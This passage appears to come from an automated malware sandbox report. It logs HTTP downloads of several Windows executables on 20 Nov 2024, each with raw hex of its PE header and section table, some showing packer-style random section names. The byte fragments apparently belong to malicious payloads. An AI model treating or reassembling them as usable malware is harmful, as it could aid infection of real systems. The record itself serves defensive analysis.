00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:54:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:54:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:54:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:54:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:54:49 GMTContent-Type: application/octet-streamContent-Length: 1957888Last-Modified: Wed, 20 Nov 2024 09:41:46 GMTConnection: keep-aliveETag: "673daeda-1de000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 70 4d 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4d 00 00 04 00 00 5e ab 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 4f 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 4f 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 69 63 65 6e 64 78 78 00 d0 1a 00 00 90 32 00 00 c4 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 76 77 66 72 71 73 67 00 10 00 00 00 60 4d 00 00 04 00 00 00 ba 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4d 00 00 22 00 00 00 be 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:55:05 GMTContent-Type: application/octet-streamContent-Length: 4387328Last-Modified: Wed, 20 Nov 2024 08:49:01 GMTConnection: keep-aliveETag: "673da27d-42f200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 e0 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 c5 00 00 04 00 00 c5 b8 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 cc c4 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 cc c4 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 76 79 67 65 6f 66 73 00 40 1b 00 00 90 a9 00 00 3e 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 63 68 76 63 6b 6d 79 00 10 00 00 00 d0 c4 00 00 06 00 00 00 ca 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 c4 00 00 22 00 00 00 d0 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:55:13 GMTContent-Type: application/octet-streamContent-Length: 1858560Last-Modified: Wed, 20 Nov 2024 09:41:32 GMTConnection: keep-aliveETag: "673daecc-1c5c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e6 72 3b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 ba 00 00 00 00 00 00 00 e0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4a 00 00 04 00 00 88 3a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 70 05 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 71 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 60 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 80 05 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 63 76 6a 67 61 70 72 00 d0 19 00 00 00 30 00 00 c4 19 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 62 72 76 6c 64 79 69 00 10 00 00 00 d0 49 00 00 04 00 00 00 36 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 49 00 00 22 00 00 00 3a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 